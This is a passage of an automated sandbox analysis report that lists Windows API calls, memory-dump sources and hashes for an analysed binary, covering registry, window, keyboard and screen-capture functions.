                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                        • API String ID: 1234038744-3931177956
                                                                                                                                        • Opcode ID: ea9950228967af6b4f646b8f08f0e6ab450166e8d93dfa79cc5b5b6d460c4d77
                                                                                                                                        • Instruction ID: a34f23ff1cae725f4dbf06f22005ee008f764b8c25023dad9bb7865ee335b7d8
                                                                                                                                        • Opcode Fuzzy Hash: ea9950228967af6b4f646b8f08f0e6ab450166e8d93dfa79cc5b5b6d460c4d77
                                                                                                                                        • Instruction Fuzzy Hash: E8D1DF71A00116EBDF009F69E885B79B7F5FF44700F2288E6E446AB290DB34DD46EB61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                          • Part of subcall function 00BAC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAB6AE,?,?), ref: 00BAC9B5
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BAC9F1
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BACA68
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BACA9E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BAB6F4
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BAB772
                                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00BAB80A
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BAB87E
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BAB89C
                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00BAB8F2
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BAB904
                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BAB922
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00BAB983
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BAB994
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                        • API String ID: 146587525-4033151799
                                                                                                                                        • Opcode ID: dec2faebc56a356351ac2ad4994c617e10990d4119d02b11df165f324fed9fc6
                                                                                                                                        • Instruction ID: 7d4b5f2b83bde4f54a3a7929604ce70b16477e7701bd93352963ca8c7db55c75
                                                                                                                                        • Opcode Fuzzy Hash: dec2faebc56a356351ac2ad4994c617e10990d4119d02b11df165f324fed9fc6
                                                                                                                                        • Instruction Fuzzy Hash: 52C16A30208241AFD714DF18C495F2ABBE5FF85318F54859CF4AA8B2A2CB75ED45CB91
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 00BA25D8
                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00BA25E8
                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00BA25F4
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00BA2601
                                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00BA266D
                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00BA26AC
                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00BA26D0
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00BA26D8
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00BA26E1
                                                                                                                                        • DeleteDC.GDI32(?), ref: 00BA26E8
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00BA26F3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                        • String ID: (
                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                        • Opcode ID: defeedab401c50a0357b387539ec5cb33abca0946738544b5da7fb8a7367aaca
                                                                                                                                        • Instruction ID: 1797894615a9f39601da6a69c3cbbb3f2b4f9a67df533ae5058e2ba2bdbfd738
                                                                                                                                        • Opcode Fuzzy Hash: defeedab401c50a0357b387539ec5cb33abca0946738544b5da7fb8a7367aaca
                                                                                                                                        • Instruction Fuzzy Hash: D861C075D04219EFCF04CFA8D984AAEBBF5FF48310F20856AE955A7250D770A951CFA0
                                                                                                                                        APIs
                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 00B5DAA1
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D659
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D66B
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D67D
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D68F
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D6A1
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D6B3
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D6C5
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D6D7
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D6E9
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D6FB
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D70D
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D71F
                                                                                                                                          • Part of subcall function 00B5D63C: _free.LIBCMT ref: 00B5D731
                                                                                                                                        • _free.LIBCMT ref: 00B5DA96
                                                                                                                                          • Part of subcall function 00B529C8: HeapFree.KERNEL32(00000000,00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000), ref: 00B529DE
                                                                                                                                          • Part of subcall function 00B529C8: GetLastError.KERNEL32(00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000,00000000), ref: 00B529F0
                                                                                                                                        • _free.LIBCMT ref: 00B5DAB8
                                                                                                                                        • _free.LIBCMT ref: 00B5DACD
                                                                                                                                        • _free.LIBCMT ref: 00B5DAD8
                                                                                                                                        • _free.LIBCMT ref: 00B5DAFA
                                                                                                                                        • _free.LIBCMT ref: 00B5DB0D
                                                                                                                                        • _free.LIBCMT ref: 00B5DB1B
                                                                                                                                        • _free.LIBCMT ref: 00B5DB26
                                                                                                                                        • _free.LIBCMT ref: 00B5DB5E
                                                                                                                                        • _free.LIBCMT ref: 00B5DB65
                                                                                                                                        • _free.LIBCMT ref: 00B5DB82
                                                                                                                                        • _free.LIBCMT ref: 00B5DB9A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                        • Opcode ID: de52c23763ee6395eaae21b3cabe4209a37aa1eb650ca8a3e5e751a57c6fda1c
                                                                                                                                        • Instruction ID: c662dd4cec80bce005a14f7d84f2e82bcffd7b03eb72375d695a35cf13b3f6fc
                                                                                                                                        • Opcode Fuzzy Hash: de52c23763ee6395eaae21b3cabe4209a37aa1eb650ca8a3e5e751a57c6fda1c
                                                                                                                                        • Instruction Fuzzy Hash: 48313D316047059FEB31AB39E845B9677E9FF01312F1546E9E859E7291DF31AC48C720
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00B8369C
                                                                                                                                        • _wcslen.LIBCMT ref: 00B836A7
                                                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B83797
                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00B8380C
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00B8385D
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B83882
                                                                                                                                        • GetParent.USER32(?), ref: 00B838A0
                                                                                                                                        • ScreenToClient.USER32(00000000), ref: 00B838A7
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00B83921
                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00B8395D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                                        • String ID: %s%u
                                                                                                                                        • API String ID: 4010501982-679674701
                                                                                                                                        • Opcode ID: 3abd432af69a003481b41fbde317437663ddfc814050e968f0e0c82f4037b3c9
                                                                                                                                        • Instruction ID: a66c6150c330695ef2157b53306d02688321b3faefc7fe27b375aaf7ad025ffe
                                                                                                                                        • Opcode Fuzzy Hash: 3abd432af69a003481b41fbde317437663ddfc814050e968f0e0c82f4037b3c9
                                                                                                                                        • Instruction Fuzzy Hash: F291B671204606AFD715EF24C885FAAF7E8FF44B50F008659F99AD31A0EB70EA45CB91
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00B84994
                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00B849DA
                                                                                                                                        • _wcslen.LIBCMT ref: 00B849EB
                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00B849F7
                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00B84A2C
                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00B84A64
                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00B84A9D
                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00B84AE6
                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00B84B20
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B84B8B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                        • String ID: ThumbnailClass
                                                                                                                                        • API String ID: 1311036022-1241985126
                                                                                                                                        • Opcode ID: c26c67c09875fd444eaffdff16dd8de89cc4b6632c2d045907c44b6ea77b836a
                                                                                                                                        • Instruction ID: 9c0688a9b26dbf7904b0d0752750a6cde25ac56c67f50a5a7220b9a38c97badb
                                                                                                                                        • Opcode Fuzzy Hash: c26c67c09875fd444eaffdff16dd8de89cc4b6632c2d045907c44b6ea77b836a
                                                                                                                                        • Instruction Fuzzy Hash: C491C2310042069FDB14EF14C985FAAB7E8FF44314F0485AAFD869B1A6DB30ED45CBA1
                                                                                                                                        APIs
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BACC64
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00BACC8D
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BACD48
                                                                                                                                          • Part of subcall function 00BACC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00BACCAA
                                                                                                                                          • Part of subcall function 00BACC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00BACCBD
                                                                                                                                          • Part of subcall function 00BACC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BACCCF
                                                                                                                                          • Part of subcall function 00BACC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BACD05
                                                                                                                                          • Part of subcall function 00BACC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BACD28
                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BACCF3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                        • API String ID: 2734957052-4033151799
                                                                                                                                        • Opcode ID: 390b12b1247f386c03e0e4e767a725d8d2cdb85098e5a0bcc28f78bdbdbc66a7
                                                                                                                                        • Instruction ID: 2d1e53d15952afdd1a2d463783aacfba3bb5ede210545c9ba1bc041910b4c6d4
                                                                                                                                        • Opcode Fuzzy Hash: 390b12b1247f386c03e0e4e767a725d8d2cdb85098e5a0bcc28f78bdbdbc66a7
                                                                                                                                        • Instruction Fuzzy Hash: CF317A71905128BBDB20DB95DC88EFFBFBCEF16750F0001A5B946E3250DBB09A459AA0
                                                                                                                                        APIs
                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B93D40
                                                                                                                                        • _wcslen.LIBCMT ref: 00B93D6D
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B93D9D
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B93DBE
                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00B93DCE
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B93E55
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B93E60
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B93E6B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                        • API String ID: 1149970189-3457252023
                                                                                                                                        • Opcode ID: 80f41cfc9da509408fb2dc9154cf2c0a823c325070d27607381018427f31b989
                                                                                                                                        • Instruction ID: 6adda059cba18f48fa3b3acdf9a3d04f9ab395745000bfac8104fb09986e8dcd
                                                                                                                                        • Opcode Fuzzy Hash: 80f41cfc9da509408fb2dc9154cf2c0a823c325070d27607381018427f31b989
                                                                                                                                        • Instruction Fuzzy Hash: E6318D76904209ABDB20DFA0DC49FAB37FCEF88B00F1041B5F619E6060EBB497448B24
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM ref: 00B8E6B4
                                                                                                                                          • Part of subcall function 00B3E551: timeGetTime.WINMM(?,?,00B8E6D4), ref: 00B3E555
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00B8E6E1
                                                                                                                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00B8E705
                                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B8E727
                                                                                                                                        • SetActiveWindow.USER32 ref: 00B8E746
                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B8E754
                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B8E773
                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 00B8E77E
                                                                                                                                        • IsWindow.USER32 ref: 00B8E78A
                                                                                                                                        • EndDialog.USER32(00000000), ref: 00B8E79B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                        • String ID: BUTTON
                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                        • Opcode ID: 929944086f00ecf602448c4d576783a4aee1691684edf7a7b9c03024c5192c32
                                                                                                                                        • Instruction ID: fcb16e1dd5f5768529b3f947664563a6d572975ac1a2e103328a85bd9eb47a39
                                                                                                                                        • Opcode Fuzzy Hash: 929944086f00ecf602448c4d576783a4aee1691684edf7a7b9c03024c5192c32
                                                                                                                                        • Instruction Fuzzy Hash: 522129B4200205BFEB10AF64EC89A3A3BA9E755B49B101965F526D31B1DFB1EC00DB24
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B8EA5D
                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B8EA73
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B8EA84
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B8EA96
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B8EAA7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$_wcslen
                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                        • API String ID: 2420728520-1007645807
                                                                                                                                        • Opcode ID: 677c83c48a1350c6048f4f84a0b16c3ac54dcbb448d07b20bdbaca02b8d3ea7b
                                                                                                                                        • Instruction ID: 5086fe1356906d802d55904dadcb764e9294208fa00fc81eb75ab75f5f7fc78a
                                                                                                                                        • Opcode Fuzzy Hash: 677c83c48a1350c6048f4f84a0b16c3ac54dcbb448d07b20bdbaca02b8d3ea7b
                                                                                                                                        • Instruction Fuzzy Hash: B0118225A5026979D724E762DC4ADFF6BFCEBE5F40F0004A5B415A20E1DFB04944C6B0
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00B8A012
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00B8A07D
                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00B8A09D
                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00B8A0B4
                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00B8A0E3
                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00B8A0F4
                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00B8A120
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00B8A12E
                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00B8A157
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 00B8A165
                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00B8A18E
                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00B8A19C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                        • Opcode ID: 148d930e8cd675ae8b0e9404151be4ddb8521b5689b2eaf45b9028ed1b96943b
                                                                                                                                        • Instruction ID: 87dbd6ea687d136b22cf7a35c2c018ff75a69a79fb7167b13a44faa63c6b1a5b
                                                                                                                                        • Opcode Fuzzy Hash: 148d930e8cd675ae8b0e9404151be4ddb8521b5689b2eaf45b9028ed1b96943b
                                                                                                                                        • Instruction Fuzzy Hash: 215199209047882AFF35FB708855BEAAFF5DF12380F0C45DAD5C2571E2EA54AA4CC762
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00B85CE2
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00B85CFB
                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B85D59
